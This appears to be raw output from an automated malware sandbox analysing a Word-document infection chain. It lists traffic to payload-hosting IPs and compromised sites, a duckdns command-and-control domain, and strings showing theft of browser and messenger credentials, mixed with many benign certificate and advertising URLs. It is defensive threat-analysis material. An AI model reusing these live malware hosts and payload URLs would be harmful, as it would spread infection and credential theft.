            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B380
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{302A12B7-6EB6-44F5-8E6E-36B5A5A90294}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
            Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: bhv2E13.tmp.12.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
            Source: RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: bhv2E13.tmp.12.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficDNS traffic detected: DNS query: asociatiatraditiimaria.ro
            Source: global trafficDNS traffic detected: DNS query: new.quranushaiqer.org.sa
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:11:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:11:22 GMTserver: LiteSpeed
            Source: powershell.exe, 00000006.00000002.378504852.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34
            Source: powershell.exe, 00000006.00000002.378504852.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/LMTS.txt
            Source: EQNEDT32.EXE, 00000002.00000002.360360157.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIF
            Source: EQNEDT32.EXE, 00000002.00000002.360360157.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFj
            Source: EQNEDT32.EXE, 00000002.00000002.360360157.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFu
            Source: powershell.exe, 00000006.00000002.375749910.000000000264B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
            Source: powershell.exe, 00000006.00000002.375749910.000000000264B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.375404766.0000000000020000.00000004.00000020.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.377841078.0000000004EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.406999069.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
            Source: wscript.exe, 0000000B.00000003.410872799.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.410735654.00000000004C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.411025079.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.410930916.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
            Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.881967871.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: RegAsm.exe, 00000008.00000002.881967871.0000000000595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpdUfw
            Source: RegAsm.exe, 00000008.00000002.881967871.0000000000595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpoUfw
            Source: powershell.exe, 00000006.00000002.375532573.00000000002BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: powershell.exe, 00000010.00000002.883036623.0000000002489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://new.quranushaiqer.org.sa
            Source: RegAsm.exe, 00000008.00000002.882398840.0000000000B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobede
            Source: powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.406999069.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
            Source: powershell.exe, 00000006.00000002.375749910.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.883117116.00000000022E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
            Source: bhv2E13.tmp.12.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
